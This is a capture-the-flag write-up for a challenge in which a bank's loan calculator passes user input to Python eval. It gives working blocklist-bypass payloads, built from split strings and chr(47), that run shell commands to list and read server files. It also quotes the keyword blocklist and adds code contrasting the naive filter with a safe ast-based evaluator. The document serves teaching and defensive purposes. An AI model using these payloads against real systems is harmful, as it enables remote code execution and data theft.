3v@l

Challenge Overview

ABC Bank's website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank's calculator and read the flag?
The website is running Here.

Solution

Once connected to the website, the naive first attempt is to submit: __import__('os').popen('ls').read()

However, the first error tells you that the keyword os is blocked. Looking at the page source, you can see this comment near the top: blocking malcious keyword like os,eval,exec,bind,connect,python,socket,ls,cat,shell,bind

The filter only looks at the submitted text, while eval acts on the values produced at runtime, so splitting a blocked word across string literals that Python concatenates gets around it: __import__('o'+'s').popen('l' + 's').read(). The result is app.py static templates, so you can cat everything in the current directory with __import__('o'+'s').popen('c' + 'at *').read(), which gives a better understanding of the code used and of what is blocked.

The second hint says "The flag file is /flag.txt", but you don't even need it: you can traverse the directories or just list the root directory, where the flag can be seen. The filter also rejects a literal / in the input, so build it at runtime with chr(47) (47 is the ASCII code of /): __import__('o'+'s').popen('l' + 's ' + chr(47)).read()

Result: app bin boot challenge dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var

Once you know the flag is in /, you can cat every file there with *, again building the / with chr(47): __import__('o'+'s').popen('c' + 'at ' + chr(47) + '*').read()
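As an added example (not the challenge's app.py, which is not reproduced here), the Python below models the kind of substring blocklist the page's comment describes, shows why the split-string and chr() tricks above slip past it, and contrasts it with an arithmetic-only evaluator built on ast, which is what a loan calculator should use instead of eval. The exact blocklist logic and the rule that a literal / is rejected are assumptions reconstructed from the writeup; the function names are mine.

```python
import ast
import operator

# Constructed stand-in for the bank's filter, copied from the keyword list
# quoted in the page's source comment (assumption: the real check is a
# case-insensitive substring match plus a literal '/' check).
BLOCKED_KEYWORDS = ["os", "eval", "exec", "bind", "connect", "python",
                    "socket", "ls", "cat", "shell", "bind"]


def naive_filter_allows(expr: str) -> bool:
    """The kind of text-only check the challenge relies on."""
    lowered = expr.lower()
    if any(word in lowered for word in BLOCKED_KEYWORDS):
        return False
    if "/" in expr:
        return False
    return True


def obfuscate(word: str) -> str:
    """Build a Python expression that evaluates to `word` but contains no
    blocked substring and no literal '/', using the page's two tricks:
    per-character string literals ('o' + 's') and chr() for '/'."""
    parts = []
    for ch in word:
        if ch == "/":
            parts.append(f"chr({ord(ch)})")   # chr(47) == '/'
        else:
            parts.append(repr(ch))             # 'o', 's', ' ', ...
    return " + ".join(parts)


def rendered_by_eval(expr: str) -> str:
    """What the server-side eval sees after the string expression runs.
    Only string expressions are evaluated here, never a command; builtins
    are restricted to chr so this demo cannot import anything."""
    return eval(expr, {"__builtins__": {"chr": chr}}, {})


# Hardened replacement: parse the input and walk a whitelist of node types.
_ALLOWED_BINOPS = {
    ast.Add: operator.add, ast.Sub: operator.sub,
    ast.Mult: operator.mul, ast.Div: operator.truediv, ast.Pow: operator.pow,
}
_MAX_EXPONENT = 10_000   # cap so 9 ** 9 ** 9 cannot pin the CPU


def safe_calc(expr: str) -> float:
    """Arithmetic-only evaluator. Names, calls, attributes and subscripts are
    not in the whitelist, so __import__('o' + 's') is rejected as syntax
    rather than filtered as text."""
    tree = ast.parse(expr, mode="eval")

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if (isinstance(node, ast.Constant)
                and isinstance(node.value, (int, float))
                and not isinstance(node.value, bool)):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _ALLOWED_BINOPS:
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Pow) and abs(right) > _MAX_EXPONENT:
                raise ValueError("exponent too large")
            return _ALLOWED_BINOPS[type(node.op)](left, right)
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(tree)


if __name__ == "__main__":
    naive = "__import__('os').popen('ls /').read()"
    bypass = f"__import__({obfuscate('os')}).popen({obfuscate('ls /')}).read()"
    print("naive payload allowed:", naive_filter_allows(naive))
    print("bypass payload allowed:", naive_filter_allows(bypass))
    print("bypass payload:", bypass)
    print("eval sees:", rendered_by_eval(obfuscate("ls /")))
    print("loan calc:", safe_calc("100000 * (1 + 0.05) ** 12"))
    try:
        safe_calc(bypass)
    except ValueError as err:
        print("hardened calculator rejected payload:", err)
```

The point of the contrast: a blocklist reasons about the submitted text, but eval executes whatever the text produces, so any way of building a string at runtime (concatenation, chr, format strings, bytes.decode) defeats it. The ast-based evaluator never executes user input at all; it only computes over a closed set of node types, so the question of which keywords to block does not arise.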

Flag: picoCTF{D0nt_Use_Unsecure_f@nctionsd06...}